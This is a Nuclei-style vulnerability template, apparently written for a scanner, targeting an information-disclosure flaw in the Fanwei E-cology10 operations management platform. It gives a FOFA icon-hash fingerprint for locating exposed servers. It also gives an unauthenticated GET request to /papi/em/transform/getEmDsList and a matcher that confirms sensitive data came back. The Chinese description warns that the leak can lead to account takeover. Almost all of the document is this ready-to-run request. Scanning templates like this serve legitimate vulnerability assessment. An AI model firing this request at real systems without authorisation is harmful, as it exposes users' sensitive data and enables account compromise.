id: FanWei-E-cology10-getEmDsList-Information-Disclosure

info:
  name: 泛微E-cology10运维管理平台 /papi/em/transform/getEmDsList 敏感信息泄露
  author: HuanXiong
  severity: medium
  description: |
    fofa: icon_hash="-1619753057"
    泛微E-cology10运维管理平台 /papi/em/transform/getEmDsList 接口存在信息泄露漏洞，攻击者可通过构造恶意HTTP请求，利用漏洞接口/路径触发漏洞，获取系统用户敏感信息，进一步造成账户被接管等安全风险，危害系统安全。
  reference:
    - 
  tags: information-disclosure, fanwei, e-cology10

http:
  - raw:
      - |-
        GET /papi/em/transform/getEmDsList HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36

    matchers:
      - type: dsl
        name: 敏感信息泄露
        dsl:
          - "status_code==200 && contains_all(body,'接口返回成功','deleteType','dsKey')"